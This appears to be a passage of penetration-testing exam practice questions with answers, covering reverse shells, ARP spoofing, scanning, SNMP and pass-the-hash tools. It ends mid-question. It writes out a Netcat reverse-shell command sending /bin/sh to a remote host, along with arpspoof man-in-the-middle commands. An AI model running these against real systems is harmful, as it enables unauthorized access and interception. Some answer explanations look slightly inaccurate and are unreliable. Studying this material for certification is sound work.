Sybex Study Guide PQs 2022 with complete solution

Sybex Study Guide PQs 2022 with complete solution

Liam executes the following command on a compromised system: nc 10.1.10.1 7337 -e /bin/sh What has he done?

• Started a reverse shell using Netcat
• Captured traffic on the Ethernet port to the console via Netcat
• Set up a bind shell using Netcat
• None of the above -Answer- A. Liam has used Netcat to set up a reverse shell. This

will connect to 10.1.10.1 on port 7337 and connect it to a Bash shell.

Alaina wants to conduct a man-in-the-middle attack against a target system. What technique can she use to make it appear that she has the IP address of a trusted server?

• ARP spoofing
• IP proofing
• DHCP pirating
• Spoofmastering -Answer- A. ARP spoofing attacks rely on responding to a system's

ARP queries faster than the actual target can, thus allowing the attacker to provide false information. Once accepted, the attacker's system can then act as a man in the middle.

Which one of the following is NOT a reason to conduct periodic penetration tests of systems and applications?

• Changes in the environment
• Cost
• Evolving threats
• New team members -Answer- B. Repeating penetration tests periodically does not

provide cost benefits to the organization. In fact, it incurs costs. However, penetration tests should be repeated because they can detect issues that arise due to changes in the tested environment and the evolving threat landscape. The use of new team members also increases the independence and value of subsequent tests.

Beth recently conducted a phishing attack against a penetration testing target in an attempt to gather credentials that she might use in later attacks. What stage of the penetration testing process is Beth in?

• Planning and Scoping
• Attacking and Exploiting
• Information Gathering and Vulnerability Identification
• Reporting and Communication Results -Answer- B. While Beth is indeed gathering

information during a phishing attack, she is conducting an active social engineering attack. This moves beyond the activities of Information Gathering and Vulnerability Identification and moves into the realm of Attacking and Exploiting.

Which one of the following security assessment tools is not commonly used during the Information Gathering and Vulnerability Identification phase of a penetration test?

• Nmap
• Nessus

• Metasploit
• Nslookup -Answer- C. Nmap is a port scanning tool used to enumerate open network

ports on a system. Nessus is a vulnerability scanner designed to detect security issues on a system. Nslookup is a DNS information gathering utility. All three of these tools may be used to gather information and detect vulnerabilities. Metasploit is an exploitation framework used to execute and attack and would be better suited for the Attacking and Exploiting phase of a penetration test.

During a penetration test, Alex discovers that he is unable to scan a server that he was able to successfully scan earlier in the day from the same IP address. What has most likely happened?

• His IP address was whitelisted.
• The server crashed.
• The network is down.
• His IP address was blacklisted -Answer- D. The IP address or network that Alex is

sending his traffic from was most likely blacklisted as part of the target organization's defensive practices. A whitelist would allow him in, and it is far less likely that the server or network has gone down.

What type of penetration test is not aimed at identifying as many vulnerabilities as possible and instead focuses on vulnerabilities that specifically align with the goals of gaining control of specific systems or data?

• An objectives-based assessment
• A compliance-based assessment
• A black-team assessment
• A red-team assessment -Answer- D. A red-team assessment is intended to simulate

an actual attack or penetration, and testers will focus on finding ways in and maximizing access rather than comprehensively identifying and testing all the vulnerabilities and flaws that they can find

After running an SNMP sweep, Greg finds that he didn't receive any results. If he knows there are no network protection devices in place and that there are devices that should respond to SNMP queries, what problem does he most likely have?

• The SNMP private string is set.
• There is an incorrect community string.
• SNMP only works on port 25.
• SNMP sweeps require the network to support broadcast traffic. -Answer- B. Most

modern SNMP deployments use a non-default community string. If Greg does not have the correct community string, he will not receive the information he is looking for. If port 25 looked like an attractive answer, you're likely thinking of SMTP. Having an SNMP private string set will not stop Greg's query if he has the proper community string, but not having the right community string will!

What does a result of * * * mean during a traceroute?

• No route to host.
• All hosts queried.

• No response to the query, perhaps a timeout, but traffic is going through.
• A firewall is blocking responses. -Answer- C. A series of three asterisks during a

traceroute means that the host query has failed but traffic is passing through. Many hosts are configured to not respond to this type of traffic but will route traffic properly.

Rick wants to look at the advertised routes to his target. What type of service should he look for to do this?

• A BGP looking glass
• A RIP-off
• An IGRP relay
• A BGP tunnel -Answer- A. BGP looking glasses are publicly available services that

allow for route inspection. Rick should find a BGP looking glass service and query the routes for his target.

Elaine wants to ensure that the limitations of her red-team penetration test are fully explained. Which of the following are valid disclaimers for her agreement? (Choose two.)

• Risk Tolerance
• Point-in-time
• Comprehensiveness
• Impact Tolerance -Answer- BC. Both the comprehensiveness of the test and the

limitation that it is only relevant at the point in time it is conducted are appropriate disclaimers for Elaine to include. The risk and impact tolerance of the organization being assessed should be used to define the scope and rules of engagement for the assessment.

Gary is conducting a black box penetration test against an organization and is gathering vulnerability scanning results for use in his tests. Which one of the following scans is most likely to provide him with helpful information within the bounds of his test?

• Stealth internal scan
• Full internal scan
• Stealth external scan
• Full external scan -Answer- . D. A full scan is likely to provide more useful and

actionable results because it includes more tests. There is no requirement in the scenario that Gary avoid detection, so a stealth scan is not necessary. However, this is a black box test, so it would not be appropriate for Gary to have access to scans conducted on the internal network

Which one of the following technologies, when used within an organization, is the LEAST likely to interfere with vulnerability scanning results achieved by external penetration testers?

• Encryption
• Firewall
• Containerization
• Intrusion prevention system -Answer- A. Encryption technology is unlikely to have

any effect on the results of vulnerability scans because it does not change the services

exposed by a system. Firewalls and intrusion prevention systems may block inbound scanning traffic before it reaches target systems. Containerized and virtualized environments may prevent external scanners from seeing services exposed within the containerized or virtualized environment

Ken is planning to conduct a vulnerability scan of an organization as part of a penetration test. He is conducting a black box test. When would it be appropriate to conduct an internal scan of the network?

• During the planning stage of the test
• As soon as the contract is signed
• After receiving permission from an administrator
• After compromising an internal host -Answer- D. Because this is a black box scan,

Ken should not (and most likely cannot) conduct an internal scan until he first compromises an internal host. Once he gains this foothold on the network, he can use that compromised system as the launching point for internal scans.

Once Chris has gained access to the network, what technique can he use to gather additional credentials?

• ARP spoofing to become a man in the middle
• Network sniffing using Wireshark
• SYN floods
• All of the above -Answer- A. Chris can use ARP spoofing to represent his workstation

as a legitimate system that other devices are attempting to connect to. As long as his responses are faster, he will then receive traffic and can act as a man in the middle.Network sniffing is useful after this to read traffic, but it isn't useful for most traffic on its own on a switched network. SYN floods are not useful for gaining credentials, thus both options C and D are incorrect.

. Which of the following tools will not allow Alice to capture NTLM v2 hashes over the wire for use in a pass-the-hash attack?

• Responder
• Mimikatz
• Ettercap
• Metasploit -Answer- B. Unlike the other options listed here, Mimikatz pulls hashes

from the lsass process. Since the question specifically notes "over the wire," Mimikatz is the only tool that cannot be used for that

Ron wants to use arpspoof to execute a man-in-the-middle attack between target host 10.0.1.5 and a server at 10.0.1.25, with a network gateway of 10.0.1.1. What commands does he need to run to do this? (Choose two.)

• arpspoof -i eth0 -t 10.0.1.5 -r 10.0.1.25
• arpspoof -i eth0 -t 10.0.1.5 -r 10.0.1.1
• arpspoof -i eth0 -t 255.255.255.255 -r 10.0.1.25